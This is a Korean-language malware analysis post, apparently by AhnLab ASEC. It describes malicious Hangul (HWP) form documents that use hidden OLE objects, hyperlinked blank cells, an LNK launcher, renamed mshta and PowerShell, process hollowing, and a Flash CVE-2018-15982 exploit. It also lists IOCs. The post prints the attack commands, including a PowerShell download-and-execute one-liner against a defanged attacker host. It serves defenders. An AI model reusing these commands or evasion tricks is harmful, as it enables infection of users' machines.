ASEC 분석팀은 최근 OLE 개체 및 플래쉬 취약점 이용한 악성 한글 문서를 확인하였다. 해당 취약점은 2020년 공유한 <한글문서(HWP) 내부 플래쉬 취약점 이용한 새로운 공격> 게시글에서 소개되었으며, 이번에 확인된 파일에도 당시와 동일한 악성 URL을 사용하고 있다. 해당 URL에는 여전히 플래시 취약점(CVE-2018-15982) 파일이 업로드되어 있어 사용자의 주의가 필요하다.
확인된 한글 파일 내부에는 OLE 개체가 삽입되어 있으며 해당 파일들은 한글 문서 실행 시 %TEMP% 폴더에 생성된다. 생성되는 파일은 다음과 같다. 기존에 알려진 powershell.exe, mshta.exe 파일을 바로 이용하지 않고, %TEMP% 경로에 복사하여 이용한 점은 행위탐지 기능을 우회하기 위한 시도로 추정된다.
| 파일명 | 설명 |
|---|---|
| hword.exe | 정상 powershell 프로그램 |
| hwp.exe | 정상 mshta 프로그램 |
| hwp.lnk | 악성 링크 파일 |
| 1234dd.tmp | 추가 악성 한글 파일 |
공격자는 개체를 삽입한 위치 앞에 하얀색 이미지를 두어 삽입된 OLE 개체가 보여지지 않도록 하였다. 문서에 삽입된 OLE 개체 중 hword.exe와 hwp.exe는 모두 win10 환경에서 동작 가능한 정상 파일이다.
문서 내용으로 보아 과거와 유사하게 프로필 양식 등의 제목으로 유포되었을 것으로 추정된다. 공격자는 생성한 악성 파일들을 실행하기 위해 각 칸에 공백을 작성한 후 하이퍼링크를 설정하였다.
따라서 사용자가 양식을 작성하기 위해 해당 칸을 클릭하면 하이퍼링크로 연결되어 ..\appdata\local\temp\hwp.lnk 가 실행된다. 이때 연결 주소가 상대 경로로 되어 있어 한글 문서가 특정 위치에 존재해야 악성 행위가 실행될 수 있다.
하이퍼링크 클릭 시 실행되는 링크 파일은 다음 명령어를 담고 있어 최종적으로 mshta를 이용하여 악성 URL에 접속한다.
- %tmp%\hwp.exe “hxxp://yukkimmo.sportsontheweb[.]net/hw.php”
현재 해당 URL에서는 다음과 같이 hwp.exe를 종료하는 명령어가 확인되지만 공격자의 의도에 따라 다양한 악성 명령어 실행이 가능하다.
hwp.exe를 종료하는 명령어 외에도 자사 인프라 상에서 해당 URL에서 전달받은 것으로 추정되는 추가 명령어가 확인되었다. 파일명이 hword.exe인 파워쉘을 이용하여 hxxp://yukkimmo.sportsontheweb[.]net/h.txt에 접속하는 명령어로 해당 URL에는 악성 스크립트 코드가 존재한다.
- hword.exe -nop -c \”iex(new-object net.webclient).downloadstring(‘hxxp://yukkimmo.sportsontheweb[.]net/h.txt’)
해당 스크립트의 기능은 다음과 같다.
1. 추가 PE 데이터 다운로드 및 실행
hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt 에서 추가 PE 데이터를 다운로드 하여 %temp% 폴더에 2247529.txt명으로 저장한다. 해당 데이터는 System32\cmd.exe에 할로잉하여 실행한다.
PE 데이터는 실행 시 Recent 폴더에서 파일명에 .hwp.lnk가 포함된 파일의 파일명을 %appdata%\12312.txt 에 저장한다.
2. 앞서 생성한 1234dd.tmp 파일로 한글 문서 변경
한글 파일 실행 시 생성되는 1234dd.tmp 파일을 3dd21.tmp 명으로 복사한다. 이후 %appdata%\12312.txt에 작성된 한글 파일명의 경로를 확인하여 복사한 3dd21.tmp 파일로 변경한다. 이로 인해 사용자가 한글 파일 재실행 시 위에서 설명한 한글 문서가 아닌 flash 개체가 삽입된 한글 문서(1234dd.tmp)가 실행된다. 변경된 한글 파일과 위에서 소개한 한글 파일의 본문 내용과 문서 정보는 모두 유사하다.
변경된 한글 문서(1234dd.tmp)는 내부에 flash 개체가 삽입되어 있으며 해당 개체 속성 확인 시 특정 URL이 포함되어 있는 것을 알 수 있다.
확인된 URL은 hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php로 <한글문서(HWP) 내부 플래쉬 취약점 이용한 새로운 공격> 에서 확인된 URL과 동일하다. 해당 URL에는 당시 확인된 플래시 취약점(CVE-2018-15982) 파일이 여전히 확인되고 있다.
아래는 추가 확인된 한글 문서이다. 해당 문서는 사례비 지급을 위한 개인정보 수집 양식으로 위장하였으며 내부에 OLE 개체가 포함되어 있다. 한글 문서 실행 시 생성되는 파일은 1234dd.tmp(한글 문서)를 제외하고 모두 앞서 설명한 파일들과 동일하다.
해당 문서에도 연락처 칸을 제외한 모든 칸에 하이퍼링크가 설정되어 있으며 클릭 시 ..\appdata\local\temp\hwp.lnk를 실행한다. LNK 파일은 %tmp%\hwp.exe “hxxp://yukkimmo.sportsontheweb[.]net/hw.php” 명령어를 실행하며 동작 과정 및 접속 URL이 모두 동일하다. 다만 위와 달리 추가로 생성되는 1234dd.tmp 파일에 flash 개체가 삽입되어 있지 않다는 차이점이 존재한다.
과거 사용되던 취약점을 악용한 사례가 최근에도 확인되어 사용자의 주의가 필요하다. 또한, 해당 악성코드의 경우 공격자로부터 추가적으로 명령을 받아 실행하는 만큼 다양한 악성 행위가 수행될 수 있다. 사용자는 작성자를 알 수 없는 문서 파일 실행을 지양하고 사용하는 응용 프로그램 및 V3를 최신 버전으로 업데이트하여 사용해야 한다.
[파일 진단]
Dropper/HWP.Agent
Exploit.HWP.Generic
Trojan/LNK.Runner
Downloader/PowerShell.Agent
Trojan/Win.Agent.C5228370
Exploit/SWF.CVE-2018-15982
[IOC]
76f8ccf8313af617df28e8e1f7f39f73 (hwp)
9a13173df687549cfce3b36d8a4e20d3 (lnk)
804d12b116bb40282fbf245db885c093 (hwp)
caa923803152dd9e6b5bf7f6b816ae98 (script)
2f4ed70149da3825be16b6057bf7b8df (exe)
65993d1cb0d1d7ce218fb267ee36f7c1 (SWF)
330f2f1eb6dc3d753b756a27694ef89b (hwp)
hxxp://yukkimmo.sportsontheweb.net/hw.php
hxxp://yukkimmo.sportsontheweb[.]net/h.txt
hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt
hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보